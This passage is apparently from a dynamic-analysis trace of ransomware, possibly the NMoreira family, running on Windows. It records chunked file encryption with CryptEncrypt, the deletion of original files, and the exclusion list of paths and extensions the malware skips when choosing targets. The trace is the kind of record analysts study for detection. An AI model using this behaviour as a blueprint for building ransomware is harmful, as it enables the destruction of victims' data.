lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.797] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.797] GetLastError () returned 0x0 [0164.797] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.797] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.797] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.797] GetLastError () returned 0x0 [0164.797] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.797] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.798] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.798] GetLastError () returned 0x0 [0164.798] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.798] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.798] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.798] GetLastError () returned 0x0 [0164.798] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.798] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.798] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.798] GetLastError () returned 0x0 [0164.798] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.798] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.798] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.798] GetLastError () returned 0x0 [0164.798] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.798] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.798] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.798] GetLastError () returned 0x0 [0164.798] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.798] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.798] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.798] GetLastError () returned 0x0 [0164.798] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.798] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.799] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.799] GetLastError () returned 0x0 [0164.799] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.799] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.799] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.799] GetLastError () returned 0x0 [0164.799] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.799] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.799] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.799] GetLastError () returned 0x0 [0164.799] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.799] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.799] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.799] GetLastError () returned 0x0 [0164.799] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.799] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.799] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.799] GetLastError () returned 0x0 [0164.799] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.799] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.799] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.799] GetLastError () returned 0x0 [0164.799] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.800] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.800] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.800] GetLastError () returned 0x0 [0164.800] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.800] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.800] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.800] GetLastError () returned 0x0 [0164.800] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.800] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.800] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.800] GetLastError () returned 0x0 [0164.800] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.800] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.800] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.800] GetLastError () returned 0x0 [0164.800] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.800] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.800] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.800] GetLastError () returned 0x0 [0164.800] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.800] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.800] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.800] GetLastError () returned 0x0 [0164.800] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.801] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.801] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.801] GetLastError () returned 0x0 [0164.801] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.801] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.801] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.801] GetLastError () returned 0x0 [0164.801] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.801] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.801] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.801] GetLastError () returned 0x0 [0164.801] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.801] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0xed, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0xed, lpOverlapped=0x0) returned 1 [0164.801] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xed, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xf0) returned 1 [0164.801] GetLastError () returned 0x0 [0164.801] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0xf0, lpOverlapped=0x0) returned 1 [0164.801] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0164.801] WriteFile (in: hFile=0x6a4, lpBuffer=0x2891f68*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0164.801] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg")) returned 0x20 [0164.801] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg", dwFileAttributes=0x20) returned 0 [0164.802] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg") returned 1 [0164.802] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg")) returned 0 [0164.802] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg" [0164.802] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0164.802] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF73C.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf73c.tmp")) returned 0xf73c [0164.804] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF73C.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf73c.tmp"), dwFlags=0x1) returned 0 [0164.804] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF73C.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf73c.tmp")) returned 1 [0164.804] CryptDestroyKey (hKey=0x9ad478) returned 1 [0164.804] wcslen (_String="OK") returned 0x2 [0164.804] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0164.804] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0164.804] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0164.804] CryptDestroyHash (hHash=0x9ad738) returned 1 [0164.804] CryptReleaseContext (hProv=0x8e2ef0, dwFlags=0x0) returned 1 [0164.804] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0164.804] PathMatchSpecW (pszFile="Peacock.htm", pszSpec="*NMCRYPT") returned 0 [0164.804] PathMatchSpecW (pszFile="Peacock.htm", pszSpec="*Recovers your files.html") returned 0 [0164.804] PathMatchSpecW (pszFile="Peacock.htm", pszSpec="*.exe") returned 0 [0164.805] PathMatchSpecW (pszFile="Peacock.htm", pszSpec="*.dll") returned 0 [0164.805] PathMatchSpecW (pszFile="Peacock.htm", pszSpec="*.lnk") returned 0 [0164.805] PathMatchSpecW (pszFile="Peacock.htm", pszSpec="*.bat") returned 0 [0164.805] PathMatchSpecW (pszFile="Peacock.htm", pszSpec="*.ini") returned 0 [0164.805] PathMatchSpecW (pszFile="Peacock.htm", pszSpec="*.msi") returned 0 [0164.805] PathMatchSpecW (pszFile="Peacock.htm", pszSpec="*.scf") returned 0 [0164.805] PathMatchSpecW (pszFile="Peacock.htm", pszSpec="*pagefile.sys*") returned 0 [0164.805] PathMatchSpecW (pszFile="Peacock.htm", pszSpec="*NTUSER.DAT*") returned 0 [0164.805] PathMatchSpecW (pszFile="Peacock.htm", pszSpec="*AppData*") returned 0 [0164.805] PathMatchSpecW (pszFile="Peacock.htm", pszSpec="*\\winrar\\*") returned 0 [0164.805] PathMatchSpecW (pszFile="Peacock.htm", pszSpec="*\\Internet Explorer\\*") returned 0 [0164.805] PathMatchSpecW (pszFile="Peacock.htm", pszSpec="*\\java\\*") returned 0 [0164.805] PathMatchSpecW (pszFile="Peacock.htm", pszSpec="*\\TeamViewer\\*") returned 0 [0164.805] PathMatchSpecW (pszFile="Peacock.htm", pszSpec="*\\windows\\*") returned 0 [0164.805] PathMatchSpecW (pszFile="Peacock.htm", pszSpec="*\\ESET\\*") returned 0 [0164.805] PathMatchSpecW (pszFile="Peacock.htm", pszSpec="*\\AVG\\*") returned 0 [0164.805] PathMatchSpecW (pszFile="Peacock.htm", pszSpec="*\\AVIRA\\*") returned 0 [0164.805] PathMatchSpecW (pszFile="Peacock.htm", pszSpec="*\\AVAST Software\\*") returned 0 [0164.805] PathMatchSpecW (pszFile="Peacock.htm", pszSpec="*Atheros*") returned 0 [0164.805] PathMatchSpecW (pszFile="Peacock.htm", pszSpec="*Realtek*") returned 0 [0164.805] PathMatchSpecW (pszFile="Peacock.htm", pszSpec="*bootmgr*") returned 0 [0164.805] PathMatchSpecW (pszFile="Peacock.htm", pszSpec="*boot*") returned 0 [0164.805] PathMatchSpecW (pszFile="Peacock.htm", pszSpec="*boot*") returned 0 [0164.805] PathMatchSpecW (pszFile="Peacock.htm", pszSpec="*CONFIG.SYS*") returned 0 [0164.805] PathMatchSpecW (pszFile="Peacock.htm", pszSpec="*IO.SYS*") returned 0 [0164.805] PathMatchSpecW (pszFile="Peacock.htm", pszSpec="*MSDOS.SYS*") returned 0 [0164.805] PathMatchSpecW (pszFile="Peacock.htm", pszSpec="*NTDETECT.COM*") returned 0 [0164.805] PathMatchSpecW (pszFile="Peacock.htm", pszSpec="*ntldr*") returned 0 [0164.805] PathMatchSpecW (pszFile="Peacock.htm", pszSpec="*chrome*") returned 0 [0164.805] PathMatchSpecW (pszFile="Peacock.htm", pszSpec="*opera*") returned 0 [0164.805] PathMatchSpecW (pszFile="Peacock.htm", pszSpec="*firefox*") returned 0 [0164.805] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Peacock.htm", pszSpec="*") returned 1 [0164.806] strlen (_Str="NMoreira") returned 0x8 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] 